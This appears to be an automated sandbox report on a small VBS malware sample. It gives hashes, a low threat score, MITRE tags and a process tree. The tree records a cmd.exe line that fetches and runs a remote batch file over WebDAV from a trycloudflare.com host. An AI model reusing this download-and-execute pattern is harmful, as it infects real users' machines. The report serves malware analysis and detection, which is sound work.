e0977fc7e613365f0f98790afa13129ce1357ca457e9c0f0573f4fed730cfa0e

Analysis

max time kernel
121s
max time network
122s
platform
windows7_x64
resource
win7-20240708-en
resource tags

arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
submitted
20/11/2024, 03:38

Target

e0977fc7e613365f0f98790afa13129ce1357ca457e9c0f0573f4fed730cfa0e.vbs
Size

156B
MD5

0658efb22d6563b4e9207e8f4ba461c7
SHA1

7335c83c02036906157f3039d13944b988ab7094
SHA256

e0977fc7e613365f0f98790afa13129ce1357ca457e9c0f0573f4fed730cfa0e
SHA512

7d6fb0d0c1a4242e79d0972b9d11a151bbefbf4304c499acf6ab6718181e617aaf57336ff30ca7d4a16bbb49c679db0ed9d4ca0f713b3fa93377e624ef13640c

Score

3^/10

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 3 IoCs

description	pid	Process	procid_target
PID 2984 wrote to memory of 1944	2984	WScript.exe	30
PID 2984 wrote to memory of 1944	2984	WScript.exe	30
PID 2984 wrote to memory of 1944	2984	WScript.exe	30

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\e0977fc7e613365f0f98790afa13129ce1357ca457e9c0f0573f4fed730cfa0e.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:2984
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c \\native-shipments-forty-polar.trycloudflare.com@SSL\DavWWWRoot\Bnew.bat
  2⤵
  PID:1944

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact